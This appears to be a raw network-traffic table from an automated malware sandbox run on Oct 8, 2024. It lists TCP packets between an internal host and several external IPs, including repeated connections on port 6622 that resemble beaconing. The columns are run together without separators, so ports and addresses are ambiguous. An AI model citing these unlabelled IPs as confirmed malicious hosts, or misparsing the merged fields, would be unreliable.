                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.516567945 CEST804979644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.516609907 CEST4979680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.516683102 CEST4979680192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.521624088 CEST804979644.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.645809889 CEST4980280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.650851011 CEST804980218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.651046991 CEST4980280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.651283026 CEST4980280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.651297092 CEST4980280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.652014971 CEST4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.656230927 CEST804980218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.656634092 CEST804980218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.656924009 CEST804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.656976938 CEST4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.657304049 CEST4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.657334089 CEST4980380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.662415981 CEST804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.662429094 CEST804980313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.864203930 CEST498046622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.869168043 CEST662249804204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.869237900 CEST498046622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.873048067 CEST498046622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:40.878241062 CEST662249804204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.002263069 CEST804980218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.002521992 CEST804980218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:42.002578974 CEST4980280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.882900000 CEST498236622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.883039951 CEST498236622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.887759924 CEST662249823204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.952984095 CEST804983518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.953107119 CEST804983518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.953149080 CEST4983580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.953993082 CEST4983580192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:44.960417986 CEST804983518.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.013701916 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.018966913 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.019153118 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.019335032 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.019351959 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.024705887 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.024746895 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.153393030 CEST804982918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.153563023 CEST4982980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.153642893 CEST804982918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.153692961 CEST4982980192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.159100056 CEST804982918.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.454770088 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.650996923 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.657902002 CEST8049843172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.658293962 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.658457994 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.658483028 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.663532019 CEST8049843172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.663548946 CEST8049843172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.698288918 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.698338032 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.703685999 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.703768969 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.828318119 CEST8049839208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.879395962 CEST4983980192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.895454884 CEST498456622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.900505066 CEST662249845204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.900592089 CEST498456622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.905010939 CEST498456622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.909898996 CEST662249845204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.944969893 CEST4984880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.949776888 CEST804984813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.949867010 CEST4984880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.950036049 CEST4984880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.950057030 CEST4984880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.955372095 CEST804984813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:45.955404043 CEST804984813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.282782078 CEST8049843172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.282841921 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.286040068 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.407455921 CEST4985180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.508018017 CEST8049843172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.508075953 CEST4984380192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.509188890 CEST8049843172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.509852886 CEST8049851172.234.222.138192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.510133028 CEST4985180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.512016058 CEST4985180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:46.512027979 CEST4985180192.168.2.4172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.236576080 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.236701965 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.236725092 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.241640091 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:49.242049932 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.657612085 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658593893 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658607006 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658615112 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658651114 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658678055 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.658719063 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.659558058 CEST662249871204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660530090 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660540104 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660559893 CEST662249871204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660615921 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660635948 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660648108 CEST498716622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660648108 CEST498716622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.660782099 CEST498716622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.661571980 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.661595106 CEST662249871204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.661618948 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.661637068 CEST498716622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.662575960 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.662606001 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.662652969 CEST4987280192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.662656069 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.668726921 CEST804987235.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.668731928 CEST662249871204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.811058044 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.811090946 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.811845064 CEST4988380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.816410065 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.816701889 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.817208052 CEST80498833.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.817286015 CEST4988380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.817447901 CEST4988380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.817636967 CEST4988380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.823070049 CEST80498833.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.823837996 CEST80498833.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.929364920 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:50.973171949 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.279866934 CEST4988580192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.285100937 CEST804988513.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.285162926 CEST4988580192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.285326958 CEST4988580192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.285342932 CEST4988580192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.290343046 CEST804988513.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.290783882 CEST804988513.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.294512033 CEST80498833.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.295233011 CEST80498833.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.295315981 CEST4988380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.295341969 CEST4988380192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.300193071 CEST80498833.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:51.386236906 CEST4988680192.168.2.4165.160.13.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.338294983 CEST662249912204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.338391066 CEST499126622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.344719887 CEST499126622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.349689960 CEST662249912204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.363815069 CEST4990580192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.422363043 CEST4991380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.427426100 CEST804991334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.427490950 CEST4991380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.428262949 CEST4991380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.428284883 CEST4991380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.433166981 CEST804991334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:54.433279037 CEST804991334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.013617992 CEST804991154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.013629913 CEST804991154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.013741016 CEST4991180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.013767004 CEST4991180192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.018599987 CEST804991154.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.171441078 CEST804991334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.172276020 CEST804991334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.172338963 CEST4991380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.174253941 CEST4991380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.180000067 CEST804991334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.283143044 CEST4991980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.288081884 CEST804991954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.289797068 CEST4991980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.289952993 CEST4991980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.290518999 CEST4991980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.295169115 CEST804991954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.295375109 CEST804991954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.312402964 CEST4992080192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.317401886 CEST804992035.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.317517042 CEST4992080192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.317620993 CEST4992080192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.317643881 CEST4992080192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.322642088 CEST804992035.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.322783947 CEST804992035.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.811377048 CEST662249912204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.811449051 CEST499126622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.811505079 CEST499126622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:55.816560030 CEST662249912204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.010620117 CEST804991954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.010790110 CEST804991954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.010812998 CEST4991980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.010838985 CEST4991980192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.015957117 CEST804991954.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.052648067 CEST804992035.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.052865028 CEST4992080192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.052947044 CEST804992035.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.053003073 CEST4992080192.168.2.435.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.057744980 CEST804992035.164.78.200192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.089025021 CEST4992680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.094026089 CEST804992618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.094161034 CEST4992680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.094455004 CEST4992680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.094480038 CEST4992680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.099567890 CEST804992618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.099632978 CEST804992618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.878351927 CEST804994744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.878417969 CEST4994780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.884533882 CEST804994744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.959841967 CEST4995280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.964818001 CEST804995218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.964889050 CEST4995280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.965022087 CEST4995280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.965061903 CEST4995280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.969903946 CEST804995218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.971285105 CEST804995218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.973433018 CEST804994554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.973659992 CEST804994554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.973942041 CEST4994580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.974044085 CEST4994580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.979840040 CEST804994554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.074393034 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.074876070 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.079935074 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080048084 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080276012 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080290079 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080319881 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080385923 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.085211039 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.085416079 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.317637920 CEST499566622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.322542906 CEST662249956204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.322773933 CEST499566622192.168.2.4204.10.160.212
